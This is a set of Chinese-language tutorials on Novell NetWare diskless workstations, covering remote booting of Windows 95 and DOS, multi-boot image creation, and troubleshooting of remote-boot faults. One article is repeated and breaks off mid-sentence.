    5.MSBATCH.INF 文件的制作并不是很重要,不需要用BATCH.EXE程序进行配置生成,在安装时，只需选择不创建默认值,直接安装共享文件即可。安装完成后,在共享 Windows 的目录中仍会有这个 MSBATCH.INF 文件。去掉只读属性进行编辑，将Hdboot=1改为Hdboot=0,将Display workstation=0 改为 Display workstation=1 即可。安装时根据提示进行安装,就可以不需要为每一台不同型号的工作站配置专门的MSBATCH.INF文件。
    6.无盘工作站安装时,有如下建议：
    a.在提示选择安装路径时请不要填入共享Windows 95 的文件目录,可以填入如“F:\winuser\001”这样的路径。
    b.在提示选择安装类型时请选择“自定义”。
    c.所有硬件都不要检测,组件也不要安装,等能正确进入Windows 95 后再安装。
    d.若是普通Ne2000兼容网卡,在安装网卡时，将“控制面板” －>“网络”中“客户”改为“Microsoft”中的“NetWare网络客户”。
    e.安装 NETBEUI 协议及 IPX 兼容协议。
    f.双击“NetWare网络客户”，首选服务器填上 NOVELL 服务器名,最好不要选择“启用登陆脚本处理”。
    g.设定NE2000兼容网卡，IRQ=3 PORT=300。
    h.设定登录方式为Windows登录。
    7.MACHINES.INI文件的修改很重要,千万不要弄错格式。
    例如某用户安装 Windows 的路径为“F:\winuser\001”,则格式为:
    [BBBBBBBBBBBB] (此为无盘工作站网卡号)
    SYSDATPATH=F:\WINUSER\001
    F=\\FS\SYS\
    (“FS”为服务器名)
    8.将声卡,显示卡等驱动程序拷入共享 Windows 的 system 目录下,当安装驱动程序提示输入驱动程序路径时填入x:\Windows\system.
    9.NetWare 的系统登录脚本中不要有“COMSPEC=F:\DOS\COMMAND.COM”的语句,否则启动 Windows时会出现“不能加载EXPLORER.EXE,请重装Windows”的错误提示,如果在安装时没选择“启用登录脚本处理”则不会出现此问题.
    10.NetWare 4.0 以上支持多重启动
    若 DOS 启动文件为 NET＄DOS.SYS, Windows 启动文件为NET＄WIN.SYS。在SYS:LOGIN目录下编辑BOOTCONF.SYS文件：0XAAAAAAAA,BBBBBBBBBBBB=NET＄DOS.SYS NET＄WIN.SYS
    （其中0X:表示16进制，AAAAAAAA:802.2,802.3协议的网络号，BBBBBBBBBBBB:指无盘工作站网卡号）

返回


Novell网无盘站多重启动

《一键清理系统垃圾》

Novell网无盘站多重启动

  在Novell网络操作系统中，实现无盘启动Win95工作站的技术相信早已为广大的电脑爱好者所熟悉。Win95、Win98也已逐渐成为流行的桌面操作系统，但在学校和企事业单位，特别是在Novell网的无盘工作站上，DOS还支撑着它的“半边天”。对于Novell操作系统，如果掌握了实现无盘启动Win95工作站的技术，要实现Win95和DOS下应用程序的和平共处，就必然要用到工作站的多重启动。
    要实现无盘镜像文件的多重启动，有两种方法可以解决。一种是硬件解决方法，使用能无盘启动Novell的专用BOOTROM，注意不同型号的网卡，它的BOOTROM也不一样，不能混用。然后修改服务器SYS卷下LOGIN目录里面的bootconf.sys文件，格式如下：“0xAAAAAAAA，BBBBBBBBBBBB=WIN.SYS DOS.SYS”（其中0x表示后面为16进制数，AAAAAAAA为802.2及802.3协议的网络号，BBBBBBBBBBBB为无盘工作站网卡ID号，win.sys为无盘启动Win95的镜像文件名，dos.sys为无盘启动DOS的镜像文件名）。当然并不是所有的网卡都能享受到这种待遇，能否实现多重启动完全要由BOOTROM来决定。另一种是软件解决方法，拿Win95的启动镜像文件开刀，对它“做做手脚”。
    我们知道，Win95并不是一个真正的操作系统，它只是建立在DOS操作上基于GUI（图形用户接口）的庞大的应用程序。它所依赖的操作系统便是DOS 7.0，既然如此，早期的DOS下的应用程序也可以运行在这个版本的DOS平台上。下面就以Netware 4.10下的多重启动镜像文件的建立为例来讲解这种“软”的方法。
    一、所需软硬件环境
    1.一台Netware 4.10网络服务器。
    2.一台能运行Win95或Win98的有盘工作站。
    3.能无盘启动Win95的工作站若干台（所选网卡为NE2000兼容网卡）。若还没有建成无盘启动Win95的工作站，可在1998、1999年的《电脑报》里面找到制作无盘启动Win95工作站的相关资料。
    二、整理启动软盘所需文件
    从有盘的Win95工作站上以超级用户身份入网，将\\SERVER\SYS\LOGIN和\\SERVER\SYS\SYSTEM分别映射为G:和H:网络驱动器（G:和H:是驱动器号，视你未使用的驱动器号而定）。在MS DOS窗口下进入G:驱动器，使用H:\dosgen win.sys／U的命令将Win95的无盘启动镜像文件还原到软盘里面，同理使用H:\dosgen dos.sys／U的命令也将DOS 6.22的无盘启动镜像文件还原到软盘里面。
    在还原的Win95启动软盘里面保留如下文件：
    ASPI2HLP.SYS　IO.SYS　　　　PROTOCOL.INI
    AUTOEXEC.BAT　MSDOS.SYS　　 RAMDRIVE.SYS
    CMD640X.SYS　 NDISHLP.SYS　 RPLBOOT.SYS
    CMD640X2.SY 　NE2000.DOS　　SETMDIR.EXE
    COMMAND.COM　 NET.EXE　 　　SNAPSHOT.EXE
    CONFIG.SYS　　NET.MSG　　　 SYSTEM.DAT
    DBLBUFF.SYS　 NWRPLTRM.EXE　WIN.BAT
    HIMEM.SYS　　 PROTMAN.EXE
    IFSHIP.SYS　　PROTMAN.DOS
    在还原的DOS启动软盘里面保留如下文件：
    AUTO.VLM　　　IPXODI，COM　　NWP.VLM
    BIND.VLM　 　 LSL.COM　 　　PNW.VLM
    CONN.VLM　　　NDS.VLM　 　　REDIR.VLM
    FIO.VLM　　　 NE2000.COM　　SECURITY.VLM
    GENERAL.VLM　 NET.CFG　　　 TRAN.VLM
    IPXNCP.VLM　　NETX.VLM　　　VLM.EXE
    在Win95启动软盘的根目录下建一Winboot子目录，先将根目录下面的NDISHLP.SYS、NE2000.DOS、NWRPLTRM.EXE、PROTMAN.DOS、PROTMAN.EXE、PROTOCOL.INI、SETMDIR.EXE、SNAPSHOT.EXE、NET.EXE、NET.MSG等文件转移到Winboot子目录下，再将DOS启动软盘所保留下来的文件全部拷入Winboot子目录中，最后将Win95共享目录下的EMM386.EXE和其COMMAND子目录下的COUNTRY.SYS两个文件拷到Win95启动软盘的根目录下。这样，一张用于多重启动的软盘便制作完毕了。
    三、软件的配置
    1.修改启动盘的msdos.sys文件。
    用文本编辑器打开上面制作的Win95启动盘根目录下的msdos.sys文件。将“BOOTGUI=1”修改为“BOOTGUI=0”，然后保存文件。这样就使操作系统启动后不进入GUI界面而直接转入纯DOS模式。
    2.建立多重配置文件config.sys。
    用文本编辑器在启动盘的根目录下建立config.sys文件如下：
    [MENU]
    MENUITEM=1 DOS ＆ XMS
    MENUITEM=2 DOS ＆ EMS
    MENUITEM=3 PWIN95
    MENUCOLOR=15，1
    MENUDEFAULT=1，10
    [1]
    COUNTRY=001，437
    DEVICE=HIMEM.SYS ／TESTMEM:OFF
    DEVICE=EMM386.EXE RAM NOEMS I=B000－B7FF
    DEVICEHIGH=A:\RAMDRIVE.SYS 960 ／E
    DOS=HIGH，UMB
    FILESHIGH=96
    STACKSHIGH=9，512
    LASTDRIVE=Z
    [2]
    COUNTRY=001，437
    DEVICE=HIMEM.SYS ／TESTMEM:OFF
    DEVICE=EMM386.EXE RAM I=B000－B7FF
    DEVICEHIGH=A:\RAMDRIVE.SYS 960 ／E
    DOS=HIGH，UMB
    FILESHIGH=96
    STACKSHIGH=9，512
    LASTDRIVE=Z
    [3]
    DEVICE=HIMEM.SYS ／TESTMEM:OFF
    DEVICEHIGH=A:\RAMDRIVE.SYS 960 ／E
    STACKS=9，512
    上面所制作的是有三个菜单选项的多重启动配置文件，其中块名为“1”和“2”的菜单项是应用于DOS下应用程序的启动配置，而块名为“3”的菜单项则是应用于Win95的启动配置。PWin95默认的国家代码和代码页分别为086和936，而我们在安装Novell服务器时大都使用的是Netware英文版，所指定的国家代码和代码页分别为001和437。由于服务器和工作站所使用的代码页不同，使用login.exe程序进行登录时，工作站是进不去网络服务器的NDS里面的。所以在前面两个菜单项里面必须使用COUNTRY命令来指定工作站所使用的国家代码和代码页。调试成功后还可以用文本编辑器打开msdos.sys文件，在文件最后加入一行语句——“BOOTKEYS=0”，以禁止用户使用F4、F5和F8键。
    3.建立批处理文件。
    用文本编辑器修改启动盘根目录下的autoexec.bat文件如下：
    @ECHO OFF
    IF NOT EXIST C:\WINBOOT\NUL MKDIR C:\WINBOOT
    COPY A:\SYSTEM.DAT C:
    COPY A:\WINBOOT C:\WINBOOT
    COPY A:\COMMAND.COM C:\WINBOOT
    C:\WINBOOT\WIN
    用文本编辑器在启动盘Winboot子目录下建立win.bat文件如下：
    @ECHO OFF
    C:
    CD\WINBOOT
    SET COMSPEC=C:\WINBOOT\COMMAND.COM
    GOTO ％CONFIG％
    :1
    GOTO 2
    :2
    LH LSL
    LH NE2000
    LH IPXODI
    VLM ／MX
    F:
    CX APPS;此行视服务器而定
    LOGIN DOS;此行视服务器而定
    GOTO END
    :3
    NWRPLTRM
    SNAPSHOT ／S ／B:C ／F ／R
    NET START NWREDIR
    NET USE ＊ ／D
    NET USE H:\\NET\SYS\PWIN95;此行视服务器而定
    PATH=H:\INSTALL\;H:\INSTALL\COMMAND;此行视服务器而定
    SETMDIR
    WIN.COM
    :END
    四、制作镜像文件
    上述软件的配置都准备就绪后，即可制作无盘启动镜像文件了。在MS DOS窗口下进入G：驱动器，使用H:\dosgen win_dos.sys 的命令便完成了镜像文件的制作。最后修改服务器SYS卷下LOGIN目录里面的bootconf.sys文件，格式如下：“0xAAAAAAAA，BBBBBBBBBBBB=WIN_DOS.SYS”。至此，利用软件配置已经实现Win95和DOS的无盘多重启动。


Novell网用BootRom启动Win95

《一键清理系统垃圾》

Novell网用BootRom启动Win95

    一、 你需要的环境及软件？
    １、一台NOVELL服务器(3.X以上即可)；
    ２、WIN95的完全版，(用的是PWIN95的完全版)；
    ３、一台WIN95机。
    ４、无盘工作站。

    二、 大概要用的文件？
    １.exe文件:
    95完全版的 \95目录\admin\nettools\netsetup\netsetup.exe,
    \95目录\admin\nettools\netsetup\batch.exe,
    \安装SERVER上95后的目录\setup.exe.

    ２、文档文件：
    Ａ. mabatch.inf文件
    这是setup.exe读取的缺省文件.据说也只读这个文件。
    Ｂ. machinese.ini文件
    这是为Flopy_Boot和Remote_Boot而设的文件，包含各台机器的信息，由Autoexe.bat中的setmdir读取。

    ３、 可参考的资料：
    \95目录\admin\reskit\helpfile\win95rk.hlp (Resource Kit Help) (“辅助说明文件” 所以可以直接用 Mouse点两下 or “文件管理器”按 Enter， 就可以看到一堆很多有用的说明。(不看也可))
    ４、 准备工作:
    设定支持长文件名HD-Boot， 最容易也效率最好，如果要用Floppy-Boot & Boot-ROM，Server 端！！一定必需绝对务必不可或缺！！“支持长文件名”。
    如何支持长文件名？
    在Novell 3.12 & 4.1 要Load OS2.nam <--- (并且加进 Autoexec.cnf)
    Add Name Space OS2 to Volume 卷名(作一次就可以了)
    Novell 3.11 (Before)要抓回 Patch (ftp.cis.nctu.edu.tw 有 Novell FTP Mirror)
    找有关 OS2xxx.nlm 把它 Load Server 再 Add Name Space...

    ５、 硬盘&RAM需求： 三种 Client Boot 所须要 RAM & HD
    (三种 Client Boot即HD_BOOT，FLOPY_BOOT，REMOTE_BOOT。)根据 Resource Kit Help 说明， 三种 Client Boot 所须要 RAM & HD列於下， 因为原说明是英文版，所以 CWin 95 须各项加 1-2 MB。

    Disk Space Requirements for Server and Local Hard Disks

    Startup type Local hard disk space Server disk space

    Local hard-disk startup,
    Local Windows 95 20 MB 0

    Local hard-disk startup,
    Windows 95 on a server1 2 MB (1 MB) 1.5 MB
    (optional)

    Floppy-disk startup,
    Windows 95 on a server 1.2 MB floppy driv e 2 MB

    Remote-boot startup,
    Windows 95 on a server 0 2 MB

    上面列的 HD-Boot 为何还要 20 MB， 是把 Swap File 算进去， 而下三列并没有把Swap File 算进 Server 空间 (当然也可把 HD-Boot Swap 设回 Server， 改System.ini 中 Pagingfile=x:\xxxxxx, 只不过 Server 会更可怜......)。

    底下是各种 Boot 对内存需求建议值
    Recommended Client System Configuration for Windows 95

    Windows 95 location Protected-mode1 RAM Real-mode2 RAM
    Local hard-disk startup,
    local Windows 95 8 MB (4 MB) 8 MB (4 MB)
    Local hard-disk startup,
    Windows 95 on a server 8 MB (4 MB) 8 MB (4 MB)
    Floppy-disk startup,
    Windows 95 on a server 8 MB (4 MB) 8 MB (4 MB)
    Remote-boot startup,
    Windows 95 on a server 8 MB (6 MB) 8 MB (4 MB)

    其中 Boot-ROM 还要占掉 1.44 MB RAM (Use RamDrive for ImageFile)， 如果要用Boot-ROM, 本地端 Client 最好要有 >12 MB RAM。

    SERVER端的设定

    Serve端的安装: 把 95 装在 Novell Server

    装在 Server上， 不分HD-Boot， Floppy或Remote Boot，就只是把 95 装上去而已， 与 3.1x 大同小异，只不过要用 netsetup.exe。我发现这程序一定要用 95 跑，试过3.1， WFW， NT 3.5都不能Run，且也不能用 Server Based 95 来跑，换句话说，要装上Server还真的要先搞出一台 100% "正身" 的 95。

    执行 NetSetup.exe 第一个会问 "设定路径", 是以 UNC 命名方式。
    \\LWARED\SYS\NETWIN.95
    ^^^^^^^^^...........装上 95的目录名称
    ^^^.....................Novell Server 的 Volume
    ^^^^^^.........................Novell Server 的名称

    而後点 “安装”後会问“共享文件的地方”， 有三选项，当然是选“服务器”然後填入“安装来源”，不管是“正式版”or“升级版”都一样，建议用“升级版”CD-ROM，其中奥妙装了就知道。(fiften注：安装完后，我还不知有什么奥妙) 比如 r:\win95 (本地端“升级版”CD-ROM)。

    再来是否要建“预设值”，这个所谓“预设值”指的是Client安装的Script。(fiften注:也即是mabatch.inf文件)选“不用预设值”，装好後再以Batch.exe造Script。如果用“建立预设值”会跑出对话视窗含很多选项，
    这就是Client设定选项。等到辛辛苦苦一项项填完後按“保存文件……”错误！“存文件失败”吐血！！不要怀疑，不是您的错，这是此程序BUG！

    继续会问“产品序号”我发现乱打都可以(不打也可以)，Client端安装时也没问。这算不算是BUG！！然後会好像当掉一样，等差不多一分多钟就可以听到CD-ROM开始“哀号”，等了差不多20分钟，95就顺利装在Novell Server了。

    装好後NetSetup.exe有两个按纽“新增”和“检视”。不知是我不会用还是此程序的BUG，设定了老半天, 要存文件都会错误或根本没存，(其实就是修改Machines.ini文件)，这两个选项是针对Floppy-Boot和Boot-ROM用的，HD-Boot可以免了。其实直接修改ini是比较保险也不容易出问题(Machines.ini)。

    Win95装上Novell记得要FLAG \SHARE-95 S SUB能共用,不然每次只能让一台Client Boot。(似乎HELP中写安装程序会自动Share)。

    (Server 端装上 95 只算是成功了 1/4, 真正重头戏是 Client 端的设定)

    ！！！注意：替换WinBoot.sys不管是什麽Boot，C-Win95的HD Protected Mode Device好像与IPX/SPX不合，如果按正常安装会发生Load Device到HD Device就挂了。常为此问题困扰，而後在Server上的\share-95中直接换掉Winboot.sys(即正常WIN95的IO.sys文件)(换成英文版的，且有两个\share-95，\share-95\suwin)。(\share-95\suwin目录是隐藏目录，可以选定Windows Explorer的View\Option\View\Show all files，则可看到)。但如有其它问题还未知，正在观察中...

    第一、HD_BOOT的Client端设定

    １、设定Client端的Script文件(即mabatch.inf文件)

    Client安装时根据server\share-95\msbatch.inf上面的内容组织及设定。更改MSBatch.inf的程序就是Batch.exe，而这个Batch.exe的功用是造出安装的Script，把我们安装“正常”Win95时应该输入的资料及设定 (如电脑名称，IP，安装项目，网络环境...)，把它写进xxxx.inf 文件，也可以存文件用另外名称(Sdat-95.inf，Marry.inf...)可是我用Setup Sdat.inf时还是找预设的MSBatch.inf来执行，这又是BUG！

    Batch.exe画面很清楚，问填啥就填啥，所有设定都是针对Client而言，比如Computer Name：填Client可不要填成Server名称，其中重点在“NetworkOptions”和“Installation Options”。

    在“Network Options”里IPX/SPX Compatiable Protocol一定要打“勾”，我们要Login NovellSever当然要走IPX/SPX，Frame预设是Automatic，也可以选802.2或802.3，这要看Server是用何协议。

    在左边有“Client for Netware Network”也一定要打“勾”，光有Network Protocol没有Client Shell也不成，下面“Prefered Server”要填装上Win95的Server（比如lwared）“Enable Logon Script Pre……”是否要起动Login Script看随意而Script中不能有载入TSR Command Line！！最後一项也是最最最重要的“Enable Server Based Setup”选“Hard Disk Boot”<---一定要选！！如果啥都没选，Setup会原封不动把Win95拷到 Local HD。（嗯...安装Win95也不一定要CD-ROM，这种方法也可以装，且也不问序号）在“Installation Options”里“Type of Installation”选越少越好（有“通用”“携带”“最少”“自定”）理由为何？因为在Novell Server仍然对“中文”长文件名“敏感”，偏偏资料夹是中文，在安装盘二次起动时会根据先前Setup的Folder搜索Server上的对应程序及Folder填回Client所设定Client-95目录，由於敏感（根本找不到 MSBatch.inf指定的程序或目录）就挂在那...真的当机且不告诉任何讯息，不像“正常”Win95当机时最起码有个对话框或“蓝蓝的萤幕”，因为这阶段还在“Real Mode”，因此当掉方式跟DOS没两样...：（等全部装成功再由“控制台”“新增应用程序”加入就可以（装好Win95却可以...？)，反正程序已在Server上跑不掉的）。奇怪的是同样情形以NT安装却不会发生，不晓得这BUG算M$ or Novell？

    “Installation Directory”里填要装Server Based 95的目录，比如 c:\net95千万不要填回server\share-95 （装回 server）。

    其它的选项看须要设，比如TCP/IP.....并不会严重影响安装成功失败。离开前一定要记得存文件，且要存回server\share-95目录。且文件名用MSBatch.inf，理由同前所述。

    （到此已算是完成2/4，但这阶段最重要，所有安装都看MSBatch.inf 设定。）

    ２、Win95从Clinet安装
    正式由Client端来装Win95，如一般用DOD Novell Client Shell，Login Novell Server。

    cd \netwin.95 (server上 \share-95 目录)
    setup [enter] (其实是setup mabatch.inf)

    就可以看到Client和Sever HD一起“哀号”

    注：一般网络卡卡上都附有LED接脚，建议把Client面盘上的“POWER”LED接到卡上（或者任何LED），在传输中会像小星星般闪烁，为何要这样作？安装过程都是Real Mode（很慢……），到盘三次起动时Real和Protected Mode切来切去（更慢！）有时候如同当掉，其实没当，唯一的依据是网络讯号（在哪里会如此我会提出来），如果超过6分钟没有闪（硬盘灯不准），我Client是P-120就等过6分钟，其它类推。网络卡背後一定有LED（没LED自己看著办），不然安装时就躲在电脑後面看LED。
    如果在 Batch.exe "Installation Options" | Set.. | Don't Stop Druing Setup有选的话。从打Setup到 "重新起动" 只须一个键 "版权声明" Yes or No。（注：一般不要选"|Don't Stop During Setup"，而选"|Stop at Every Page"，因为有时会通不过，如我安装时在硬件检测时通不过，后来减少了硬件的检测项时才通过。)
    （注：在点了Finish后可能会不Reboot，而出现Invalid DPMI return form xxxx:xxxx，这不要紧，用Ctrl+Alt+Del或Reset重启动即可）

    下列是“最乾净”的Autoexec.bat和Config.sys文件

    由於HD-Boot的Win95所建的Config和Autoexec是依照原旧DOS的Config和Autoexec所以没有预设值。

    config.sys
    device=c:\net95\himem.sys
    device=c:\net95\emm386.exe

    autoexec.bat
    c:\net95\snapshot /S
    c:\net95\net start NWRedir
    c:\net95\net use * /d
    c:\net95\net use W: \\LWARED\SYS
    SET PATH=c:\net95;W:\NETWIN.95\;W:\NETWIN.95\COMMAND;
    set tmp=c:\net95
    set temp=c:\net95

    如有Win95尚未支持的周边（SCSI，CDROM...）在上列两文件加上。
    如Win95有支持就尽量保持“乾净”。

    再Reboot，硬盘轰隆一阵子，等输入ID和Pass（注：你在Novell上的帐号及密码），而後Client和Server HD 又开始发狂。在“第一次起动”画面後，屏幕一片黑暗而且会很久，那是在RegEdit System，也许隔了一分钟 LED 才闪一下...神啊！！请赐我大无畏的耐性让我能平安渡过是漫漫的Setup，并佑我不要发狂与电脑“玉碎”！！！

    而後如“正常”装Win95一般，“检视应硬件随插随用”，“组织控制台...”...到了“启动工具列设定”以後又停住了，不明原因，可能又是Novell对中文长文件名敏感所引起。再等...

返回


Novell无盘工作站远程启动故障诊断

《一键清理系统垃圾》

Novell无盘工作站远程启动故障诊断

    无盘工作站是Novell网络应用过程中常常使用的。它能使一台既无硬盘又无软驱的PC机，通过一块网卡和网络电缆与服务器相连，从服务器上下载操作系统及应用软件来完成一般有盘机才能完成的工作。然而在实际应用中，常出现无盘工作站连不上网，找不到该网上的服务器，启动时死机等等故障。本文结合自身的管理经验来探讨一下这些故障的原因及解决办法，供大家参考。

    一、远程启动的故障诊断

    （一）、远程启动故障诊断的基本步骤
    1.检查网线是否连接正确。如果用的是细缆，可检查T头处的阻抗是否是50欧姆；如果用的是双绞线，可用网络测试仪来检测，保证线路畅通；2.网卡的PROM是否设置为enable，端口地址是否与机内的其他设备发生冲突。完成这一检测通常需要用到该网卡的设置盘；3.确认用来生成远程启动文件的启动软盘能正确地从A盘启动并引导上网。启动软盘应只包含必须的文件，AUTOEXEC.BAT和CONFIG.SYS文件应尽量简单；4.用最新版的DOSGEN来生成远程启动映像文件。目前最新的DOSGEN是93年5月8日的。这一程序可以在Novell的WWW站点（http:\\support.Novell.com）的RPLKT4.EXE文件中得到。RPLSK4.EXE还包含后面提到的RPLFIX.EXE、RPLODI.EXE等程序；5.确定NET.CFG适合你的网卡。如果不能确定，可试着去掉NET.CFG，用网卡的默认配置来启动，以避免NET.CFG中可能存在的错误；6.在CONFIG.SYS中Lastdrive应根据使用VLM或NETX来设置相应的值。一般情况下用VLM时Lastdrive=Z，用NETX时Lastdrive=E；7.确认AUTOEXEC.BAT和其他必须的启动程序都放在SYS:LOGIN目录下。因为无盘工作站一旦连上服务器，远程启动映像文件将被从无盘工作站中删除；8.确认在bootconf.sys中所指定的网络地址、MAC地址正确，远程启动映像文件在sys:login目录下；9.使用最新的ODI驱动程序及网卡驱动程序。
    （二）、RemoteBootWorkstation方式的故障诊断
    1.如果远程启动映像文件是用DOS5.0或更高版本，那么就需要用RPLFIX.EXE来对所生成的映像文件进行修改。这是由于5.0及以上版本的DOS，其内核较之低版本的DOS有较大的增加。否则，无盘工作站将会在启动远程映像文件时死机；2.采用RemoteBoot方式远程引导且用ODI方式上网的无盘工作站，必须运行RPLODI.COM，且必须紧跟在LSL.COM后运行；3.服务器、无盘工作站的网卡必须采用Ethernet_802.3或Ethernet_II帧格式；4.确认服务器的Reply togetnearest server=ON
    （三）、RPL启动方式的故障诊断
    1.保证在SYS：LOGIN目录下有所需的*.RPL文件，且版本是最新的；2.服务器上必须运行最新版的网卡驱动程序和RPL.NLM，确认RPL协议已绑定到网卡上；3.保证网卡使用的是Ethernet_802.2帧格式；4.在远程启动映像文件中，不要使用RPLODI.COM。

    二、几种典型的问题及原因

    问题1：无盘工作站屏幕上显示“Error finding server”
    原因：该无盘工作站采用Remote Boot方式启动，但未能找到服务器。可能是网线断了，服务器未运行网卡驱动程序，未绑定IPX协议，未采用Ethernet_802.3帧格式，未设置Reply togetnearest server=ON等。
    问题2：无盘工作站屏幕上显示一个连续计数，但不能上网
    原因：该无盘工作站采用RPL方式启动，但未能找到服务器。可能是网线断了，服务器未运行网卡驱动程序，未装载RPL.NLM模块，未绑定IPX或RPL协议，未采用Ethernet_802.2帧格式，服务器SYS：LOGIN目录下没有RPL文件等。
    问题3：无盘工作站启动后找到服务器，但出现“MS_DOSStarting...”后死机。
    原因：远程启动映像文件采用了DOS5.0或更高的版本，但未用RPLFIX来进行修改。
    问题4：无盘工作站启动后运行到装入网卡驱动程序时死机。
    原因：该无盘工作站采用RemoteBoot方式启动，但在LSL后未运行RPLODI.COM。

返回


NOVELL远程启动WIN95（无盘）

《一键清理系统垃圾》

NOVELL远程启动WIN95（无盘）

1. 你需要的环境及软件?
(1).一台NOVELL 服务器(3.X以上即可);

(2).WIN95的完全版,(用的是PWIN95的完全版);

(3).一台WIN95机.

(4).无盘工作站.

2. 大概要用的文件?

(1).exe文件:

95完全版的 \95目录\admin\nettools\netsetup\netsetup.exe,

\95目录\admin\nettools\netsetup\batch.exe,

\安装SERVER上95后的目录\setup.exe.

(2).文档文件:

A. mabatch.inf文件

这是setup.exe读取的缺省文件.据说也只读这个文件.

B. machinese.ini文件

这是为Flopy_Boot和Remote_Boot而设的文件.包含各台机器的信息,由

Autoexe.bat中的setmdir读取.

3. 可参考的资料:

\95目录\admin\reskit\helpfile\win95rk.hlp (Resource Kit Help) (因为是 "辅助说

明文件" 所以可以直接用 Mouse点两下 or "文件管理器"按 Enter, 就可以看到一堆很多有

用的说明.(不看也可))

4. 准备工作:

设定支持长文件名HD-Boot, 最容易也效率最好,如果要用Floppy-Boot &

Boot-ROM,Server 端 !!!!!! 一定必需绝对务必不可或缺!!!!!! "支持长文件名

"!!!!!!

如何支持长文件名？

在Novell 3.12 & 4.1 要

Load OS2.nam <--- (并且加进 Autoexec.cnf)

Add Name Space OS2 to Volume 卷名(作一次就可以了)

Novell 3.11 (Before)要抓回 Patch (ftp.cis.nctu.edu.tw 有 Novell FTP

Mirror)

找有关 OS2xxx.nlm 把它 Load Server 再 Add Name Space...

5. 硬盘&RAM需求: 三种 Client Boot 所须要 RAM & HD

(三种 Client Boot即HD_BOOT,FLOPY_BOOT,REMOTE_BOOT.)根据 Resource Kit Help 说

明, 三种 Client Boot 所须要 RAM & HD列於下, 因为原说明是英文版, 所以 CWin 95 须

各项加 1-2 MB.

====================

Disk Space Requirements for Server and Local Hard Disks

Startup type Local hard disk space Server disk space

====================

Local hard-disk startup,

Local Windows 95 20 MB 0

====================

Local hard-disk startup,

Windows 95 on a server1 2 MB (1 MB) 1.5 MB

(optional)

====================

Floppy-disk startup,

Windows 95 on a server 1.2 MB floppy driv e 2 MB

====================

Remote-boot startup,

Windows 95 on a server 0 2 MB

====================

上面列的 HD-Boot 为何还要 20 MB, 是把 Swap File 算进去, 而下三列并没有把

Swap File 算进 Server 空间 (当然也可把 HD-Boot Swap 设回 Server, 改

System.ini 中 Pagingfile=x:\xxxxxx, 只不过 Server 会更可怜......).

底下是各种 Boot 对内存需求建议值

Recommended Client System Configuration for Windows 95

Windows 95 location Protected-mode1 RAM Real-mode2 RAM

Local hard-disk startup,

local Windows 95 8 MB (4 MB) 8 MB (4 MB)

Local hard-disk startup,

Windows 95 on a server 8 MB (4 MB) 8 MB (4 MB)

Floppy-disk startup,

Windows 95 on a server 8 MB (4 MB) 8 MB (4 MB)

Remote-boot startup,

Windows 95 on a server 8 MB (6 MB) 8 MB (4 MB)

其中 Boot-ROM 还要占掉 1.44 MB RAM (Use RamDrive for ImageFile), 如果要

用Boot-ROM, 本地端 Client 最好要有 >12 MB RAM.

返回目录

SERVER端的设定

----------------

Serve端的安装: 把 95 装在 Novell Server

装在 Server上, 不分HD-Boot, Floppy或Remote Boot,就只是把 95 装上去而

已, 与 3.1x 大同小异,只不过要用 netsetup.exe. 我发现这程序一定要用 95 跑,试过

3.1, WFW, NT 3.5都不能Run, 且也不能用 Server Based 95 来跑, 换句话说,

要装上 Server 还真的要先搞出一台 100% "正身" 的 95.

执行 NetSetup.exe 第一个会问 "设定路径", 是以 UNC 命名方式.

\\LWARED\SYS\NETWIN.95

^^^^^^^^^...........装上 95的目录名称

^^^.....................Novell Server 的 Volume

^^^^^^.........................Novell Server 的名称

而後点 "安装" 後会问 "共享文件的地方", 有三选项, 当然是选 "服务器".

然後填入 "安装来源", 不管是 "正式版" or "升级版" 都一样, 建议用 "升级版"

CD-ROM, 其中奥妙装了就知道.(fiften注:安装完后，我还不知有什么奥妙)

比如 r:\win95 (本地端 "升级版" CD-ROM)

再来是否要建 "预设值", 这个所谓 "预设值" 指的是 Client 安装的 Script.

(fiften注:也即是mabatch.inf文件)选 "不用预设值", 装好後再以 Batch.exe

造 Script.如果用 "建立预设值" 会跑出对话视窗含很多选项,

这就是 Client 设定选项.等到辛辛苦苦一项项填完後按 "存文件" ......

"错误!存文件失败" 吐血!!!不要怀疑, 不是您的错, 这是此程序BUG!

继续会问 "产品序号", 我发现乱打都可以(不打也可以), Client 端安装时也没问

.

这算不算是 BUG!!...?然後会好像当掉一样, 等差不多一分多钟就可以听到CD-ROM

开始 "哀号"，等了差不多 20 分钟, 95 就顺利装在 Novell Server 了.

装好後 NetSetup.exe 有两个按纽 "新增" & "检视".不知是我不会用还是此程序

的BUG, 设定了老半天, 要存文件都会错误 or 根本没存，(其实就是修改Machines.ini文

件)，这两个选项是针对 Floppy-Boot & Boot-ROM 用的, HD-Boot 可以免了.其实直接修改

ini 是比较保险也不容易出问题(Machines.ini).

95 装上 Novell 记得要 FLAG \SHARE-95 S SUB 能共用, 不然每次只能让一台

Client Boot.(似乎HELP中写安装程序会自动Share).

(Server 端装上 95 只算是成功了 1/4, 真正重头戏是 Client 端的设定.)

**************************************************************************

!!!!!!注意:替换WinBoot.sys不管是什麽 Boot, C-Win95 的 HD Protected Mode Device

好像与 IPX/SPX 不合,如果按正常安装会发生 Load Device 到 HD Device 就挂了. 常为此

问题困扰, 而後在 Server 上的 \share-95 中直接换掉 Winboot.sys(即正常WIN95的

IO.sys文件)(换成英文版的,且有两个\share-95, \share-95\suwin).(\share-95\suwin目

录是隐藏目录,可以选定Windows Explorer的View\Option\View\Show all files,则可看

到). 但如有其它问题还未知, 正在观察中...

返回目录

第一.HD_BOOT的Client端设定

1.设定Client端的Script文件(即mabatch.inf文件)

Client 安装时根据 server\share-95\msbatch.inf 上面的内容组织及设定.更改

MSBatch.inf 的程序就是 Batch.exe, 而这个 Batch.exe 的功用是造出安装的Script, 把

我们安装 "正常" 95 时应该输入的资料及设定 (如电脑名称, IP, 安

装项目, 网络环境...), 把它写进 xxxx.inf 文件, 也可以存文件用另外名称

(Sdat-95.inf,Marry.inf...) 可是我用 Setup Sdat.inf 时还是找预设的 MSBatch.inf 来

执行, 这又是 BUG! 乎...?

Batch.exe 画面很清楚, 问填啥就填啥, 所有设定都是针对 Client 而言, 比如Computer

Name: 填 Client 可不要填成 Server 名称, 其中重点在 "NetworkOptions" &

"Installation Options"

在 "Network Options" 里IPX/SPX Compatiable Protocol 一定要打 "勾", 我们要 Login

NovellSever 当然要走 IPX/SPX, Frame 预设是 Automatic, 也可以选 802.2 or 802.3 看

Server是用何协议.

在左边有 "Client for Netware Network " 也一定要打 "勾", 光有 Network Protocol 没

